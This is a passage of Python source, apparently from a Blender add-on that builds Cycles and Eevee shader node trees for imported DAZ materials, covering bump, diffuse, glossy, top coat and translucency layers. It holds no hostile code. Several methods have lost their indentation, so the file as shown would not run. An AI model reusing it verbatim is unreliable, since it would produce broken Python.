        wmat = ob.matrix_world.copy()
        me2.transform(wmat)
        setWorldMatrix(ob, Matrix())
        area = sum([f.area for f in me2.polygons if f.material_index == mnum])
        # Restore the original mesh/matrix and discard the copy.
        ob.data = me
        setWorldMatrix(ob, wmat)
        bpy.data.meshes.remove(me2, do_unlink=True)
        area *= 1e-4/(LS.scale*LS.scale)
        for socket in self.geoemit:
            socket.default_value /= area
            for link in self.tree.links:
                if link.to_socket == socket:
                    node = link.from_node
                    if node.type == 'MATH':
                        node.inputs[0].default_value /= area

    def setTransSettings(self, useRefraction, useBlend, color, alpha):
        """Configure Blender/Eevee transparency settings for this material."""
        LS.usedFeatures["Transparent"] = True
        mat = self.rna
        if useBlend:
            mat.blend_method = 'BLEND'
            mat.show_transparent_back = False
        else:
            mat.blend_method = 'HASHED'
        mat.use_screen_refraction = useRefraction
        # Newer Blender versions renamed the shadow-method attribute.
        if hasattr(mat, "transparent_shadow_method"):
            mat.transparent_shadow_method = 'HASHED'
        else:
            mat.shadow_method = 'HASHED'
        if not self.isShellMat:
            mat.diffuse_color[0:3] = color
            mat.diffuse_color[3] = alpha
#-------------------------------------------------------------
# Cycles node tree
#-------------------------------------------------------------
# Node-layout grid: nodes are placed in NCOLUMNS columns, XSIZE apart
# horizontally; each column keeps a running y-cursor stepped by YSIZE.
NCOLUMNS = 20
XSIZE = 300
YSIZE = 250
class CyclesTree:
    """Builder that assembles a material's Cycles/Eevee shader node tree."""
    def __init__(self, cmat):
        self.type = 'CYCLES'
        self.material = cmat            # owning CyclesMaterial
        self.cycles = None              # current head node of the Cycles chain
        self.eevee = None               # current head node of the Eevee chain
        self.column = 4                 # current layout column for addNode()
        self.ycoords = NCOLUMNS*[2*YSIZE]   # per-column y layout cursors
        self.texnodes = {}
        self.nodes = None               # material node collection (set in makeTree)
        self.links = None               # material link collection (set in makeTree)
        self.groups = {}
        self.liegroups = []
        self.diffuseTex = None
        self.fresnel = None
        self.normal = None              # normal-map node, if built
        self.bump = None                # bump node, if built
        self.bumpval = 0
        self.bumptex = None
        self.texco = None               # default texture-coordinate socket
        self.texcos = {}                # extra UV sockets, keyed by uv-set key
        self.displacement = None
        self.volume = None
        self.useCutout = False
        self.useTranslucency = False
def __repr__(self):
return ("<Cycles %s %s %s>" % (self.material.rna, self.nodes, self.links))
    def getValue(self, channel, default):
        """Delegate: fetch a scalar channel value from the material."""
        return self.material.getValue(channel, default)
    def isEnabled(self, channel):
        """Delegate: whether the named material feature is enabled."""
        return self.material.enabled[channel]
    def getColor(self, channel, default):
        """Delegate: fetch a color channel value from the material."""
        return self.material.getColor(channel, default)
    def addNode(self, stype, col=None, size=0, label=None, parent=None):
        """Create a node of type *stype* in layout column *col* (default: the
        current column) and advance that column's y-cursor by YSIZE + *size*."""
        if col is None:
            col = self.column
        node = self.nodes.new(type = stype)
        node.location = ((col-2)*XSIZE, self.ycoords[col])
        self.ycoords[col] -= (YSIZE + size)
        if label:
            node.label = label
        if parent:
            node.parent = parent
        return node
    def getTexco(self, uv):
        """Return the texture-coordinate socket for UV set *uv*, creating a
        UV-map node on demand; fall back to the default texco socket."""
        key = self.material.getUvKey(uv, self.texcos)
        if key is None:
            return self.texco
        elif key not in self.texcos.keys():
            self.addUvNode(key, key)
        return self.texcos[key]
def getCyclesSocket(self):
if "Cycles" in self.cycles.outputs.keys():
return self.cycles.outputs["Cycles"]
else:
return self.cycles.outputs[0]
def getEeveeSocket(self):
if "Eevee" in self.eevee.outputs.keys():
return self.eevee.outputs["Eevee"]
else:
return self.eevee.outputs[0]
def addGroup(self, classdef, name, col=None, size=0, args=[], force=False):
if col is None:
col = self.column
node = self.addNode("ShaderNodeGroup", col, size=size)
group = classdef()
if name in bpy.data.node_groups.keys() and not force:
tree = bpy.data.node_groups[name]
if group.checkSockets(tree):
node.node_tree = tree
return node
group.create(node, name, self)
group.addNodes(args)
return node
    def addShellGroup(self, shell, push):
        """Add a node group implementing geometry shell *shell* layered on top
        of this material; reuse the shell's existing tree when possible.
        Returns the group node, or None for invisible shells."""
        shmat = shell.material
        shmat.isShellMat = True
        shname = shell.name
        # Fully transparent shells contribute nothing; skip them.
        if (shmat.getValue("getChannelCutoutOpacity", 1) == 0 or
            shmat.getValue("getChannelOpacity", 1) == 0):
            print("Invisible shell %s for %s" % (shname, self.material.name))
            return None
        node = self.addNode("ShaderNodeGroup")
        node.width = 240
        nname = ("%s_%s" % (shname, self.material.name))
        node.name = nname
        node.label = shname
        # Reuse an already-built tree from this shell or its match.
        if shell.tree:
            node.node_tree = shell.tree
            node.inputs["Influence"].default_value = 1.0
            return node
        elif shell.match and shell.match.tree:
            node.node_tree = shell.tree = shell.match.tree
            node.inputs["Influence"].default_value = 1.0
            return node
        # Otherwise build a fresh shell group of the right flavor.
        if self.type == 'CYCLES':
            from .cgroup import OpaqueShellCyclesGroup, RefractiveShellCyclesGroup
            if shmat.refractive:
                group = RefractiveShellCyclesGroup(push)
            else:
                group = OpaqueShellCyclesGroup(push)
        elif self.type == 'PBR':
            from .cgroup import OpaqueShellPbrGroup, RefractiveShellPbrGroup
            if shmat.refractive:
                group = RefractiveShellPbrGroup(push)
            else:
                group = OpaqueShellPbrGroup(push)
        else:
            raise RuntimeError("Bug Cycles type %s" % self.type)
        group.create(node, nname, self)
        group.addNodes((shmat, shell.uv))
        node.inputs["Influence"].default_value = 1.0
        shell.tree = shmat.tree = node.node_tree
        shmat.geometry = self.material.geometry
        return node
    def build(self):
        """Assemble the full node tree: base layer, cutout, volume,
        displacement, shells, then the output node."""
        self.makeTree()
        self.buildLayer("")
        self.buildCutout()
        self.buildVolume()
        self.buildDisplacementNodes()
        self.buildShells()
        self.buildOutput()
    def buildShells(self):
        """Chain shell group nodes onto the tree, ordered by push distance."""
        shells = []
        n = 0
        for shell in self.material.shells.values():
            for geonode in shell.geometry.nodes.values():
                # n keeps the sort stable for equal push values.
                shells.append((geonode.push, n, shell))
                n += 1
        shells.sort()
        if shells:
            self.column += 1
        for push,n,shell in shells:
            node = self.addShellGroup(shell, push)
            if node:
                self.links.new(self.getCyclesSocket(), node.inputs["Cycles"])
                self.links.new(self.getEeveeSocket(), node.inputs["Eevee"])
                self.links.new(self.getTexco(shell.uv), node.inputs["UV"])
                if self.displacement:
                    self.links.new(self.displacement, node.inputs["Displacement"])
                self.cycles = self.eevee = node
                self.displacement = node.outputs["Displacement"]
                self.ycoords[self.column] -= 50
    def buildLayer(self, uvname):
        """Build one surface layer: normal/bump, diffuse, translucency,
        makeup, overlay, glossy/dual-lobe, refraction, top coat, emission.
        Returns the current head shader node."""
        self.buildNormal(uvname)
        self.buildBump()
        self.buildDetail(uvname)
        self.buildDiffuse()
        self.buildTranslucency()
        self.buildMakeup()
        self.buildOverlay()
        # Dual-lobe weight selects which specular models are built.
        if self.material.dualLobeWeight == 1:
            self.buildDualLobe()
        elif self.material.dualLobeWeight == 0:
            self.buildGlossy()
        else:
            self.buildGlossy()
            self.buildDualLobe()
        if self.material.refractive:
            self.buildRefraction()
        self.buildTopCoat()
        self.buildEmission()
        return self.cycles
    def makeTree(self, slot="UV"):
        """Enable nodes on the material, clear any existing tree, and create
        the texture-coordinate node; returns that node."""
        mat = self.material.rna
        mat.use_nodes = True
        mat.node_tree.nodes.clear()
        self.nodes = mat.node_tree.nodes
        self.links = mat.node_tree.links
        return self.addTexco(slot)
    def addTexco(self, slot):
        """Create the base texture-coordinate (or UV-map) node, apply the
        material's offset/tiling via a mapping node, and add nodes for any
        extra UV sets."""
        if self.material.useDefaultUvs:
            node = self.addNode("ShaderNodeTexCoord", 1)
            self.texco = node.outputs[slot]
        else:
            node = self.addNode("ShaderNodeUVMap", 1)
            node.uv_map = self.material.uv_set.name
            self.texco = node.outputs["UV"]
        ox = self.getValue("getChannelHorizontalOffset", 0)
        oy = self.getValue("getChannelVerticalOffset", 0)
        kx = self.getValue("getChannelHorizontalTiles", 1)
        ky = self.getValue("getChannelVerticalTiles", 1)
        self.mapTexco(ox, oy, kx, ky)
        for key,uvset in self.material.uv_sets.items():
            self.addUvNode(key, uvset.name)
        return node
def addUvNode(self, key, uvname):
node = self.addNode("ShaderNodeUVMap", 1)
node.uv_map = uvname
slot = "UV"
self.texcos[key] = node.outputs[slot]
    def mapTexco(self, ox, oy, kx, ky):
        """Insert a mapping node converting DAZ offset (ox,oy) and tiling
        (kx,ky) into Blender texture-space scale/translation, and reroute
        self.texco through it."""
        if ox != 0 or oy != 0 or kx not in [0,1] or ky not in [0,1]:
            sx = sy = 1
            dx = dy = 0
            if kx != 0:
                sx = 1/kx
                dx = -ox/kx
            if ky != 0:
                sy = 1/ky
                # NOTE(review): dy lacks the minus sign used for dx —
                # presumably intentional because the V axis is flipped; confirm.
                dy = oy/ky
            mapping = self.addMappingNode((dx,dy,sx,sy,0), None)
            if mapping:
                self.linkVector(self.texco, mapping, 0)
                self.texco = mapping
    def addMappingNode(self, data, map):
        """Create a TEXTURE-type mapping node from (dx,dy,sx,sy,rz), or
        return None when the transform is the identity."""
        dx,dy,sx,sy,rz = data
        if (sx != 1 or sy != 1 or dx != 0 or dy != 0 or rz != 0):
            mapping = self.addNode("ShaderNodeMapping", 1)
            mapping.vector_type = 'TEXTURE'
            # Blender < 2.81 exposes the transform as node attributes,
            # newer versions as input sockets.
            if hasattr(mapping, "translation"):
                mapping.translation = (dx,dy,0)
                mapping.scale = (sx,sy,1)
                if rz != 0:
                    mapping.rotation = (0,0,rz)
            else:
                mapping.inputs['Location'].default_value = (dx,dy,0)
                mapping.inputs['Scale'].default_value = (sx,sy,1)
                if rz != 0:
                    mapping.inputs['Rotation'].default_value = (0,0,rz)
            if map and not map.invert and hasattr(mapping, "use_min"):
                mapping.use_min = mapping.use_max = 1
            return mapping
        return None
#-------------------------------------------------------------
# Normal
#-------------------------------------------------------------
    def buildNormal(self, uvname):
        """Build the normal-map node when the channel has a texture and a
        positive strength."""
        if not self.isEnabled("Normal"):
            return
        strength,tex = self.getColorTex("getChannelNormal", "NONE", 1.0)
        if strength>0 and tex:
            self.buildNormalMap(strength, tex, uvname)
    def buildNormalMap(self, strength, tex, uvname):
        """Create a tangent-space normal-map node fed by *tex* and store it
        as self.normal."""
        self.normal = self.addNode("ShaderNodeNormalMap", col=3)
        self.normal.space = "TANGENT"
        if uvname:
            self.normal.uv_map = uvname
        elif self.material.uv_set:
            self.normal.uv_map = self.material.uv_set.name
        self.normal.inputs["Strength"].default_value = strength
        self.links.new(tex.outputs[0], self.normal.inputs["Color"])
#-------------------------------------------------------------
# Bump
#-------------------------------------------------------------
    def buildBump(self):
        """Build the bump node when the channel has a texture and a nonzero
        value, chaining the normal map into it."""
        if not self.isEnabled("Bump"):
            return
        self.bumpval,self.bumptex = self.getColorTex("getChannelBump", "NONE", 0, False)
        if self.bumpval and self.bumptex:
            self.bump = self.buildBumpMap(self.bumpval, self.bumptex, col=3)
            self.linkNormal(self.bump)
    def buildBumpMap(self, bump, bumptex, col=3):
        """Create a bump node with strength *bump*, registering its Distance
        socket for later area-based correction."""
        node = self.addNode("ShaderNodeBump", col=col)
        node.inputs["Strength"].default_value = bump * GS.bumpFactor
        self.links.new(bumptex.outputs[0], node.inputs["Height"])
        self.material.addGeoBump(bumptex, node.inputs["Distance"])
        return node
    def linkBumpNormal(self, node):
        """Feed the bump node (preferred) or the normal-map node into
        *node*'s Normal input, when either exists."""
        if self.bump:
            self.links.new(self.bump.outputs["Normal"], node.inputs["Normal"])
        elif self.normal:
            self.links.new(self.normal.outputs["Normal"], node.inputs["Normal"])
def linkBump(self, node):
if self.bump:
self.links.new(self.bump.outputs["Normal"], node.inputs["Normal"])
def linkNormal(self, node):
if self.normal:
self.links.new(self.normal.outputs["Normal"], node.inputs["Normal"])
#-------------------------------------------------------------
# Detail
#-------------------------------------------------------------
    def buildDetail(self, uvname):
        """Layer a detail height/normal map on top of the existing bump or
        normal chain, with its own offset/tiling (restored afterwards)."""
        if not self.isEnabled("Detail"):
            return
        weight,wttex = self.getColorTex(["Detail Weight"], "NONE", 0.0)
        if weight == 0:
            return
        # Detail maps have their own mapping; save and restore the texco.
        texco = self.texco
        ox = LS.scale*self.getValue(["Detail Horizontal Offset"], 0)
        oy = LS.scale*self.getValue(["Detail Vertical Offset"], 0)
        kx = self.getValue(["Detail Horizontal Tiles"], 1)
        ky = self.getValue(["Detail Vertical Tiles"], 1)
        self.mapTexco(ox, oy, kx, ky)
        strength,tex = self.getColorTex(["Detail Normal Map"], "NONE", 1.0)
        weight = weight*strength
        mode = self.getValue(["Detail Normal Map Mode"], 0)
        # Height Map, Normal Map
        if mode == 0:
            if weight == 0:
                pass
            elif self.bump:
                # Blend the detail height into the existing bump height
                # with a multiply-add node.
                link = getLinkTo(self, self.bump, "Height")
                if link:
                    mult = self.addNode("ShaderNodeMath", 3)
                    mult.operation = 'MULTIPLY_ADD'
                    self.links.new(tex.outputs[0], mult.inputs[0])
                    self.linkScalar(wttex, mult, weight, 1)
                    self.links.new(link.from_socket, mult.inputs[2])
                    self.links.new(mult.outputs["Value"], self.bump.inputs["Height"])
            else:
                tex = self.multiplyTexs(tex, wttex)
                self.bump = self.buildBumpMap(weight, tex, col=3)
                self.linkNormal(self.bump)
        elif mode == 1:
            if weight == 0:
                pass
            elif self.normal:
                # Overlay-mix the detail normal with the existing normal color.
                link = getLinkTo(self, self.normal, "Color")
                if link:
                    mix = self.addNode("ShaderNodeMixRGB", 3)
                    mix.blend_type = 'OVERLAY'
                    self.linkScalar(wttex, mix, weight, "Fac")
                    NORMAL = (0.5, 0.5, 1, 1)
                    mix.inputs["Color1"].default_value = NORMAL
                    mix.inputs["Color2"].default_value = NORMAL
                    self.links.new(link.from_socket, mix.inputs["Color1"])
                    if tex:
                        self.links.new(tex.outputs[0], mix.inputs["Color2"])
                    self.links.new(mix.outputs["Color"], self.normal.inputs["Color"])
                else:
                    self.links.new(tex.outputs[0], self.normal.inputs["Color"])
            else:
                self.buildNormalMap(weight, tex, uvname)
                if wttex:
                    self.links.new(wttex.outputs[0], self.normal.inputs["Strength"])
                if self.bump:
                    self.links.new(self.normal.outputs["Normal"], self.bump.inputs["Normal"])
        self.texco = texco
#-------------------------------------------------------------
# Diffuse and Diffuse Overlay
#-------------------------------------------------------------
    def getDiffuseColor(self):
        """Diffuse color/texture, tinted by SSS reflectance when the base
        color effect is scatter-transmit."""
        color,tex = self.getColorTex("getChannelDiffuse", "COLOR", WHITE)
        effect = self.getValue(["Base Color Effect"], 0)
        if effect > 0:  # Scatter Transmit, Scatter Transmit Intensity
            tint = self.getColor(["SSS Reflectance Tint"], WHITE)
            color = self.compProd(color, tint)
        return color,tex
def compProd(self, x, y):
return [x[0]*y[0], x[1]*y[1], x[2]*y[2]]
    def buildDiffuse(self):
        """Create the base diffuse BSDF node as the head of both chains."""
        self.column = 4
        if not self.isEnabled("Diffuse"):
            return
        color,tex = self.getDiffuseColor()
        self.diffuseTex = tex
        node = self.addNode("ShaderNodeBsdfDiffuse")
        self.cycles = self.eevee = node
        self.linkColor(tex, node, color, "Color")
        roughness,roughtex = self.getColorTex(["Diffuse Roughness"], "NONE", 0, False)
        if self.isEnabled("Detail"):
            # Detail maps can modulate the diffuse roughness.
            detrough,dettex = self.getColorTex(["Detail Specular Roughness Mult"], "NONE", 0, False)
            roughness *= detrough
            roughtex = self.multiplyTexs(dettex, roughtex)
        self.setRoughness(node, "Roughness", roughness, roughtex)
        self.linkBumpNormal(node)
        LS.usedFeatures["Diffuse"] = True
    def buildOverlay(self):
        """Mix a diffuse-overlay group over the current shader when the
        overlay weight is nonzero; returns True if built."""
        if self.getValue(["Diffuse Overlay Weight"], 0):
            self.column += 1
            slot = self.getImageSlot(["Diffuse Overlay Weight"])
            weight,wttex = self.getColorTex(["Diffuse Overlay Weight"], "NONE", 0, slot=slot)
            # "Squared" weight doubles the exponent of the (already squared) mix.
            if self.getValue(["Diffuse Overlay Weight Squared"], False):
                power = 4
            else:
                power = 2
            if wttex:
                wttex = self.raiseToPower(wttex, power, slot)
            color,tex = self.getColorTex(["Diffuse Overlay Color"], "COLOR", WHITE)
            from .cgroup import DiffuseGroup
            node = self.addGroup(DiffuseGroup, "DAZ Overlay")
            self.linkColor(tex, node, color, "Color")
            roughness,roughtex = self.getColorTex(["Diffuse Overlay Roughness"], "NONE", 0, False)
            self.setRoughness(node, "Roughness", roughness, roughtex)
            self.linkBumpNormal(node)
            self.mixWithActive(weight**power, wttex, node)
            return True
        else:
            return False
def getImageSlot(self, attr):
if self.material.getImageMod(attr, "grayscale_mode") == "alpha":
return "Alpha"
else:
return 0
    def raiseToPower(self, tex, power, slot):
        """Insert a POWER math node raising *tex*'s output (from *slot*, or
        slot 0 if absent) to *power*; returns the math node."""
        node = self.addNode("ShaderNodeMath", col=self.column-1)
        node.operation = 'POWER'
        node.inputs[1].default_value = power
        if slot not in tex.outputs.keys():
            slot = 0
        self.links.new(tex.outputs[slot], node.inputs[0])
        return node
def getColorTex(self, attr, colorSpace, default, useFactor=True, useTex=True, maxval=0, value=None, slot=0):
channel = self.material.getChannel(attr)
if channel is None:
return default,None
if isinstance(channel, tuple):
channel = channel[0]
if useTex:
tex = self.addTexImageNode(channel, colorSpace)
else:
tex = None
if value is not None:
pass
elif channel["type"] in ["color", "float_color"]:
value = self.material.getChannelColor(channel, default)
else:
value = self.material.getChannelValue(channel, default)
if value < 0:
return 0,None
if useFactor:
value,tex = self.multiplySomeTex(value, tex, slot)
if isVector(value) and not isVector(default):
value = (value[0] + value[1] + value[2])/3
if not isVector(value) and maxval and value > maxval:
value = maxval
return value,tex
#-------------------------------------------------------------
# Makeup
#-------------------------------------------------------------
    def buildMakeup(self):
        """Mix a makeup group over the current shader when makeup is enabled
        with nonzero weight; returns True if built."""
        if not self.getValue(["Makeup Enable"], False):
            return False
        wt = self.getValue(["Makeup Weight"], 0)
        if wt == 0:
            # NOTE(review): returns None here but False above — callers
            # apparently only rely on truthiness.
            return
        from .cgroup import MakeupGroup
        self.column += 1
        node = self.addGroup(MakeupGroup, "DAZ Makeup", size=100)
        color,tex = self.getColorTex(["Makeup Base Color"], "COLOR", WHITE, False)
        self.linkColor(tex, node, color, "Color")
        roughness,roughtex = self.getColorTex(["Makeup Roughness Mult"], "NONE", 0.0, False)
        self.linkScalar(roughtex, node, roughness, "Roughness")
        self.linkBumpNormal(node)
        wt,wttex = self.getColorTex(["Makeup Weight"], "NONE", 0.0, False)
        self.mixWithActive(wt, wttex, node)
        return True
#-------------------------------------------------------------
# Dual Lobe
#-------------------------------------------------------------
    def buildDualLobe(self):
        """Mix a dual-lobe specular group (Uber Iray or PBRSkin flavor) over
        the current shader."""
        from .cgroup import DualLobeGroupUberIray, DualLobeGroupPBRSkin
        if not self.isEnabled("Dual Lobe Specular"):
            return
        self.column += 1
        if self.material.shader == 'PBRSKIN':
            node = self.addGroup(DualLobeGroupPBRSkin, "DAZ Dual Lobe PBR", size=100)
        else:
            node = self.addGroup(DualLobeGroupUberIray, "DAZ Dual Lobe Uber", size=100)
        value,tex = self.getColorTex(["Dual Lobe Specular Weight"], "NONE", 0.5, False)
        node.inputs["Weight"].default_value = value
        if tex:
            wttex = self.multiplyScalarTex(value, tex)
            if wttex:
                self.links.new(wttex.outputs[0], node.inputs["Weight"])
        # IOR derived from reflectivity: 1.1 + 0.7*reflectivity.
        value,tex = self.getColorTex(["Dual Lobe Specular Reflectivity"], "NONE", 0.5, False)
        node.inputs["IOR"].default_value = 1.1 + 0.7*value
        if tex:
            iortex = self.multiplyAddScalarTex(0.7*value, 1.1, tex)
            self.links.new(iortex.outputs[0], node.inputs["IOR"])
        ratio = self.getValue(["Dual Lobe Specular Ratio"], 1.0)
        if self.material.shader == 'PBRSKIN':
            # PBRSkin derives lobe 2 from lobe 1 via multipliers, and its
            # ratio convention is inverted relative to Uber Iray.
            roughness,roughtex = self.getColorTex(["Specular Lobe 1 Roughness"], "NONE", 0.0, False)
            lobe2mult = self.getValue(["Specular Lobe 2 Roughness Mult"], 1.0)
            duallobemult = self.getValue(["Dual Lobe Specular Roughness Mult"], 1.0)
            self.setRoughness(node, "Roughness 1", roughness*duallobemult, roughtex)
            self.setRoughness(node, "Roughness 2", roughness*duallobemult*lobe2mult, roughtex)
            ratio = 1 - ratio
        else:
            roughness1,roughtex1 = self.getColorTex(["Specular Lobe 1 Roughness"], "NONE", 0.0, False)
            self.setRoughness(node, "Roughness 1", roughness1, roughtex1)
            roughness2,roughtex2 = self.getColorTex(["Specular Lobe 2 Roughness"], "NONE", 0.0, False)
            self.setRoughness(node, "Roughness 2", roughness2, roughtex2)
        self.linkBumpNormal(node)
        self.mixWithActive(ratio, None, node, keep=True)
        LS.usedFeatures["Glossy"] = True
    def getGlossyColor(self):
        # glossy bsdf color = iray glossy color * iray glossy layered weight
        """Return the effective glossy color and texture, combining the
        glossy color channel with the layered-weight channel."""
        strength,strtex = self.getColorTex("getChannelGlossyLayeredWeight", "NONE", 1.0, False)
        color,tex = self.getColorTex("getChannelGlossyColor", "COLOR", WHITE, False)
        if tex and strtex:
            tex = self.mixTexs('MULTIPLY', tex, strtex)
        elif strtex:
            tex = strtex
        color = strength*color
        if tex:
            tex = self.multiplyVectorTex(color, tex)
        return color,tex
    def buildGlossy(self):
        """Mix a glossy group over the current shader, with a Fresnel group
        driving the mix factor."""
        color = self.getColor("getChannelGlossyColor", BLACK)
        strength = self.getValue("getChannelGlossyLayeredWeight", 0)
        if isBlack(color) or strength == 0:
            return
        from .cgroup import FresnelGroup
        fresnel = self.addGroup(FresnelGroup, "DAZ Fresnel")
        ior,iortex = self.getFresnelIOR()
        self.linkScalar(iortex, fresnel, ior, "IOR")
        self.linkBumpNormal(fresnel)
        self.fresnel = fresnel
        # glossy bsdf roughness = iray glossy roughness ^ 2
        channel,invert = self.material.getChannelGlossiness()
        invert = not invert             # roughness = invert glossiness
        value = clamp( self.material.getChannelValue(channel, 0.0) )
        if invert:
            roughness = (1-value)
        else:
            roughness = value
        fnroughness = roughness**2
        if bpy.app.version < (2,80):
            # Blender 2.79's glossy BSDF expects squared roughness.
            roughness = roughness**2
            value = value**2
        from .cgroup import GlossyGroup
        self.column += 1
        glossy = self.addGroup(GlossyGroup, "DAZ Glossy", size=100)
        color,tex = self.getGlossyColor()
        self.linkColor(tex, glossy, color, "Color")
        roughtex = self.addSlot(channel, glossy, "Roughness", roughness, value, invert)
        self.linkBumpNormal(glossy)
        self.linkScalar(roughtex, fresnel, fnroughness, "Roughness")
        LS.usedFeatures["Glossy"] = True
        self.mixWithActive(1.0, self.fresnel, glossy)
    def getFresnelIOR(self):
        # fresnel ior = 1.1 + iray glossy reflectivity * 0.7
        # fresnel ior = 1.1 + iray glossy specular / 0.078
        """Derive a Fresnel IOR from the Uber Iray glossy reflectivity or
        specular channel; defaults to 1.45 for other shaders."""
        ior = 1.45
        iortex = None
        if self.material.shader == 'UBER_IRAY':
            # NOTE(review): if basemix is neither 0 nor 1, factor/tex are
            # unbound below — presumably basemix is always 0 or 1; confirm.
            if self.material.basemix == 0:  # Metallic/Roughness
                value,tex = self.getColorTex("getChannelGlossyReflectivity", "NONE", 0, False)
                factor = 0.7 * value
            elif self.material.basemix == 1:  # Specular/Glossiness
                color,tex = self.getColorTex("getChannelGlossySpecular", "COLOR", WHITE, False)
                factor = 0.7 * averageColor(color) / 0.078
            ior = 1.1 + factor
            if tex:
                iortex = self.multiplyAddScalarTex(factor, 1.1, tex)
        return ior, iortex
#-------------------------------------------------------------
# Top Coat
#-------------------------------------------------------------
    def buildTopCoat(self):
        """Mix a top-coat group over the current shader, honoring the
        layering mode (reflectivity/weighted/fresnel) and bump mode."""
        if not self.isEnabled("Top Coat"):
            return
        topweight = self.getValue(["Top Coat Weight"], 0)
        if topweight == 0:
            return
        # Top Coat Layering Mode
        # [ "Reflectivity", "Weighted", "Fresnel", "Custom Curve" ]
        lmode = self.getValue(["Top Coat Layering Mode"], 0)
        fresnel = refltex = None
        if lmode == 2:  # Fresnel
            from .cgroup import FresnelGroup
            weight = 0.5
            fresnel = self.addGroup(FresnelGroup, "DAZ Fresnel")
            ior,iortex = self.getColorTex(["Top Coat IOR"], "NONE", 1.45)
            self.linkScalar(iortex, fresnel, ior, "IOR")
        if self.material.shader == 'UBER_IRAY':
            # Top Coat Bump Mode
            # [ "Height Map", "Normal Map" ]
            if not fresnel:
                refl,refltex = self.getColorTex(["Reflectivity"], "NONE", 0, useFactor=False)
                weight = 0.05 * topweight * refl
            bump,bumptex = self.getColorTex(["Top Coat Bump"], "NONE", 0, useFactor=False)
        else:
            if not fresnel:
                refl,refltex = self.getColorTex(["Top Coat Reflectivity"], "NONE", 0, useFactor=False)
                weight = 0.05 * topweight * refl
            bump = self.getValue(["Top Coat Bump Weight"], 0)
            bump *= self.bumpval
            bumptex = None
        _,tex = self.getColorTex(["Top Coat Weight"], "NONE", 0, value=weight)
        weighttex = self.multiplyTexs(tex, refltex)
        color,coltex = self.getColorTex(["Top Coat Color"], "COLOR", WHITE)
        roughness,roughtex = self.getColorTex(["Top Coat Roughness"], "NONE", 0)
        if roughness == 0:
            # Fall back to glossiness: roughness = 1 - glossiness^2.
            glossiness,glosstex = self.getColorTex(["Top Coat Glossiness"], "NONE", 1)
            roughness = 1 - glossiness**2
            roughtex = self.invertTex(glosstex, 5)
        from .cgroup import TopCoatGroup
        self.column += 1
        top = self.addGroup(TopCoatGroup, "DAZ Top Coat", size=100)
        self.linkColor(coltex, top, color, "Color")
        self.linkScalar(roughtex, top, roughness, "Roughness")
        if self.material.shader == 'PBRSKIN':
            if self.bumptex:
                self.links.new(self.bumptex.outputs[0], top.inputs["Height"])
                self.material.addGeoBump(self.bumptex, top.inputs["Distance"])
            self.linkNormal(top)
        elif bumptex:
            self.links.new(bumptex.outputs[0], top.inputs["Height"])
            self.material.addGeoBump(bumptex, top.inputs["Distance"])
            self.linkBumpNormal(top)
        top.inputs["Bump"].default_value = bump * GS.bumpFactor
        self.mixWithActive(weight, weighttex, top)
        if fresnel:
            self.linkScalar(roughtex, fresnel, roughness, "Roughness")
            self.linkBumpNormal(fresnel)
            self.links.new(fresnel.outputs[0], top.inputs["Fac"])
#-------------------------------------------------------------
# Translucency
#-------------------------------------------------------------
    def checkTranslucency(self):
        """Decide whether a translucency layer should be built.
        The two conditions are exhaustive: thin-wall/volume/translucent
        materials qualify, everything else does not."""
        if not self.isEnabled("Translucency"):
            return False
        if (self.material.thinWall or
            self.volume or
            self.material.translucent):
            return True
        if (self.material.refractive or
            not self.material.translucent):
            return False
    def buildTranslucency(self):
        """Mix a translucency (fake SSS) group over the current shader,
        deriving the SSS radius from the translucency and SSS colors."""
        if (GS.materialMethod != 'BSDF' or
            not self.checkTranslucency()):
            return
        fac = self.getValue("getChannelTranslucencyWeight", 0)
        effect = self.getValue(["Base Color Effect"], 0)
        if fac == 0 and effect != 1:
            return
        self.column += 1
        mat = self.material.rna
        color,tex = self.getTranslucentColor()
        if isBlack(color):
            return
        from .cgroup import TranslucentGroup
        node = self.addGroup(TranslucentGroup, "DAZ Translucent", size=200)
        node.width = 200
        self.linkColor(tex, node, color, "Color")
        node.inputs["Gamma"].default_value = 3.5
        node.inputs["Scale"].default_value = 1.0
        ssscolor,ssstex,sssmode = self.getSSSColor()
        radius,radtex = self.getSSSRadius(color, ssscolor, ssstex, sssmode)
        self.linkColor(radtex, node, radius, "Radius")
        # With a real volume the Cycles side gets SSS from the volume instead.
        node.inputs["Cycles Mix Factor"].default_value = (not GS.useVolume)
        node.inputs["Eevee Mix Factor"].default_value = 1.0
        self.linkBumpNormal(node)
        fac,factex = self.getColorTex("getChannelTranslucencyWeight", "NONE", 0)
        if effect == 1:  # Scatter and transmit
            fac = 0.5 + fac/2
            if factex and factex.type == 'MATH':
                factex.inputs[0].default_value = fac
        self.mixWithActive(fac, factex, node)
        LS.usedFeatures["Transparent"] = True
        self.endSSS()
    def getTranslucentColor(self):
        """Translucency color/texture; falls back to the diffuse texture when
        faking translucency without a volume."""
        color,tex = self.getColorTex(["Translucency Color"], "COLOR", BLACK)
        if (tex is None and
            (GS.useFakeTranslucencyTexture or not GS.useVolume)):
            tex = self.diffuseTex
        return color,tex
    def getSSSColor(self):
        """Return (color, texture, mode) for subsurface scattering.
        Mode 1 (chromatic) uses the SSS color channel; mode 0 (mono) builds a
        gray color from the clamped SSS amount."""
        sssmode = self.getValue(["SSS Mode"], 0)
        # [ "Mono", "Chromatic" ]
        if sssmode == 1:
            color,tex = self.getColorTex("getChannelSSSColor", "COLOR", BLACK)
        elif sssmode == 0:
            sss,tex = self.getColorTex(["SSS Amount"], "NONE", 0.0)
            if sss > 1:
                sss = 1
            color = (sss,sss,sss)
        else:
            color,tex = WHITE,None
        return color,tex,sssmode
    def endSSS(self):
        """Mark SSS as used and enable Eevee SSS translucency when supported."""
        LS.usedFeatures["SSS"] = True
        mat = self.material.rna
        if hasattr(mat, "use_sss_translucency"):
            mat.use_sss_translucency = True
    def getSSSRadius(self, color, ssscolor, ssstex, sssmode):
        # if there's no volume we use the sss to make translucency
        # please note that here we only use the iray base translucency color with no textures
        # as for blender 2.8x eevee doesn't support nodes in the radius channel so we deal with it
        """Compute the SSS radius color from the SSS and transmitted colors,
        scaled to scene units. Thin-wall materials use the base color as-is."""
        if self.material.thinWall:
            return color,None
        if sssmode == 1 and isWhite(ssscolor):
            ssscolor = BLACK
        elif sssmode == 0:  # Mono
            s,ssstex = self.getColorTex("getChannelSSSAmount", "NONE", 0)
            if s > 1:
                s = 1
            ssscolor = Vector((s,s,s))
        trans,transtex = self.getColorTex(["Transmitted Color"], "COLOR", BLACK)
        if isWhite(trans):
            trans = BLACK
        rad,radtex = self.sumColors(ssscolor, ssstex, trans, transtex)
